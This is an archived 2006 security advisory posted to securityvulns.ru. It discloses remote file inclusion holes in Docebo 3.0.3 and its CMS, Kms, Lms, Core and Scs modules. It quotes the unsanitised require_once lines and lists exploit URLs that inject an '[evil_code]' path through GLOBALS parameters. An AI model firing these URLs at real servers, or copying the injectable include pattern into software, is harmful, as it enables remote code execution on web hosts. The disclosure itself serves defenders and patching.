Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  phpCommunityCalendar 4.0.3 Multiple Vulnerabilites

  UBB.threads >= 6.4.x Remote File Inclusion

  Prodder Remote Arbitrary Command Execution

  Perlpodder Remote Arbitrary Command Execution

From:Kacper <kacper1964_(at)_yahoo.pl>
Date:23.05.2006
Subject:Docebo 3.0.3/DoceboCMS,DoceboKms,DoceboLms,DoceboCore,DoceboScs - Remote File Include Vulnerabilities

################ DEVIL TEAM THE BEST POLISH TEAM #################
#Docebo 3.0.3/DoceboCMS,DoceboKms,DoceboLms,DoceboCore,DoceboScs - Remote File Include Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
####################################################################
#Docebo Site: http://www.docebocms.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In All scripts:
[code]
require_once($GLOBALS['where_framework'].'/lib/lib.permission.
php');
require_once($GLOBALS['where_framework'].'/lib/lib.pagewriter.
php');
require_once($GLOBALS['where_framework'].'/lib/lib.lang.
php');
require_once($GLOBALS['where_framework'].'/lib/lib.template.
php');
require_once($GLOBALS['where_framework'].'/lib/lib.mimetype.
php');
[/code]

#DoceboCMS:

http://www.site.com/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=[evi
l_code]

#DoceboKms:

http://www.site.com/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_fr
amework]=[evil_code]

http://www.site.com/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_
framework]=[evil_code]

#DoceboLms:

http://www.site.com/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=[evil_cod
e]

#DoceboCore:

http://www.site.com/doceboCore/lib/lib.php?GLOBALS[where_framework]=[evil_code]

#DoceboScs:

http://www.site.com/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=[evil_code
]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#The End ;-)
#Pozdro Dla wszystkich o których zapomnia.em ;-)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server